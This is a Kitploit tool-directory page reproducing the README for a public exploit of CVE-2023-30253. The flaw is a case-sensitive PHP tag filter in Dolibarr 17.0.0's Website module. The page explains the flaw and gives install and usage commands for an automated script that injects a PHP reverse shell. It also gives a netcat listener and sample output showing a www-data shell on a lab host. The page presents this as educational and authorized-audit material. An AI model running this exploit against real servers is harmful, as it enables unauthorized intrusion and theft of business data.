Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-30253-exploit — CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 RCE via PHP code injection (exploit educativo) | Kitploit
Tools/GitHubGitHub/jeanback1/cve-2023-30253-exploit
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubjeanback1/cve-2023-30253-exploit

CVE-2023-30253-exploit

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 RCE via PHP code injection (exploit educativo)

View Repository
84 months agoNot yet reviewed
Website

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 Remote Code Execution

Python 3.8+ License CVSS

PHP code injection exploit for Dolibarr ERP/CRM v17.0.0 that allows obtaining a reverse shell as www-data user via the Website/CMS module.

⚠️ For educational purposes and authorized audits only.


📑 Table of Contents

  • What is CVE-2023-30253?
  • How does the vulnerability work?
  • Impact
  • What does this exploit do?
  • Requirements
  • Installation
  • Usage
  • Practical example
  • The exploit step by step
  • Mitigation
  • References

🔍 What is CVE-2023-30253?

CVE-2023-30253 is a PHP code injection vulnerability (CWE-94: Improper Control of Generation of Code) in Dolibarr ERP/CRM versions prior to 17.0.1.

It was discovered and reported by the Swascan team (now Hacktivesecurity) in May 2023. The vulnerability resides in the Website/CMS module, which allows authenticated users to create and manage websites within Dolibarr.

FieldValue
CVECVE-2023-30253
CVSS v3.18.8 (HIGH)
VectorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
TypeCWE-94 — Code Injection
Affected softwareDolibarr ERP/CRM < 17.0.1
PrivilegesAuthenticated user (any role)
PatchDolibarr 17.0.1 — commit 4f6055c

⚙️ How does the vulnerability work?

Dolibarr implements a filter to prevent users from injecting PHP code into the content of Website module pages. However, this filter has a critical flaw: it is case-sensitive.

// Vulnerable code (simplified) in Dolibarr 17.0.0
if (preg_match('/<\?php/i', $content)) {
    // Blocks only "<?php" in exact lowercase... or not?
    die("PHP code detected!");
}

The filter literally looks for the string <?php in lowercase. But PHP allows any combination of uppercase and lowercase for the opening tag. This means:

TagFiltered?Executed by PHP?
<?php ... ?>✅✅
<?PHP ... ?>❌✅
<?Php ... ?>❌✅
<?pHp ... ?>❌✅

The exploit uses <?PHP (uppercase) to bypass the filter, but any variant works.

Additionally, the filter is only applied when saving the content. When serving the page, Dolibarr passes the content without additional sanitization to the PHP interpreter, which executes any code with the <? opening tag.


💥 Impact

An authenticated attacker can:

  • Remote Command Execution (RCE) on the server
  • Access the Dolibarr database (clients, invoices, users)
  • Read sensitive system files (/etc/passwd, configuration)
  • Use the server as a pivot point for internal attacks
  • Install malware, webshells, or persistent backdoors

Why is it critical? Dolibarr is used as an enterprise ERP/CRM. An intrusion can expose customer data, finances, contracts, and internal credentials.


🛠️ What does this exploit do?

The exploit automates the complete exploitation process in 5 steps:

┌─────────────────────────────────────────────────────────┐
│                   CVE-2023-30253                       │
│                                                         │
│  1. Login          → Authenticate to Dolibarr           │
│  2. Create Website → Create an empty website            │
│  3. Create Page    → Create a page within the site      │
│  4. Inject Shell   → Inject PHP reverse shell           │
│  5. Trigger        → Execute the payload                │
│                                                         │
│  Result: 🎯 Reverse shell as www-data                   │
└─────────────────────────────────────────────────────────┘

Features:

  • ✅ Automatic handling of anti-CSRF tokens
  • ✅ Persistent session with cookies
  • ✅ Automatic detection of pageid
  • ✅ Verbose mode for debugging
  • ✅ Colored output (can be disabled)
  • ✅ Reverse shell payload via fsockopen + proc_open

📋 Requirements

  • Python 3.8+
  • requests
  • beautifulsoup4

Or simply:

pip install -r requirements.txt

📦 Installation

# Clone the repository
git clone https://github.com/jeanback1/CVE-2023-30253-exploit.git
cd CVE-2023-30253-exploit

# Install dependencies
pip install -r requirements.txt

🚀 Usage

python exploit.py <target> <username> <password> <lhost> <lport> [options]

Positional arguments:

ArgumentDescriptionExample
targetBase URL of Dolibarrhttp://crm.board.htb
usernameDolibarr usernameadmin
passwordDolibarr passwordadmin
lhostYour IP (where you will receive the shell)10.10.14.5
lportYour port (where you will receive the shell)4444

Options:

OptionDescription
-v, --verboseShow detailed debug information
--no-colorDisable colors in output
-h, --helpShow help and examples

🎯 Practical example

Terminal 1 — Start reverse shell listener

nc -lvnp 4444

Terminal 2 — Run exploit

python exploit.py http://crm.board.htb admin admin 10.10.14.5 4444 --verbose

Expected output

════════════════════════════════════════════════════════
 CVE-2023-30253 — Dolibarr 17.0.0 RCE Exploit
════════════════════════════════════════════════════════

  Target:   http://crm.board.htb
  User:     admin
  LHOST:    10.10.14.5
  LPORT:    4444
  Site ID:  s3a1f2bc

──────────────────────────────────────────────────

[10:45:12] Step 1/5: Logging in...
[10:45:12]   ✓ Session started successfully

[10:45:13] Step 2/5: Creating website...
[10:45:13]   ✓ Website 's3a1f2bc' created

[10:45:13] Step 3/5: Creating page within the site...
[10:45:13]   ✓ Page created inside the site

[10:45:14] Step 4/5: Injecting reverse shell → 10.10.14.5:4444...
[10:45:14]   ✓ PHP code injected successfully

[10:45:14] Step 5/5: Executing payload (trigger)...

════════════════════════════════════════════════════════
  EXPLOITATION COMPLETED
════════════════════════════════════════════════════════

  Trigger URL:
  http://crm.board.htb/public/website/index.php?website=s3a1f2bc&pageref=s3a1f2bc

  Instructions:
  1. In another terminal, start your listener:
     nc -lvnp 4444
  2. Access the Trigger URL (the exploit already did this)
  3. You will receive a reverse shell as www-data

Terminal 1 — Shell obtained 🎯

Listening on 0.0.0.0 4444
Connection received on 10.129.231.37 52846
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Download Tool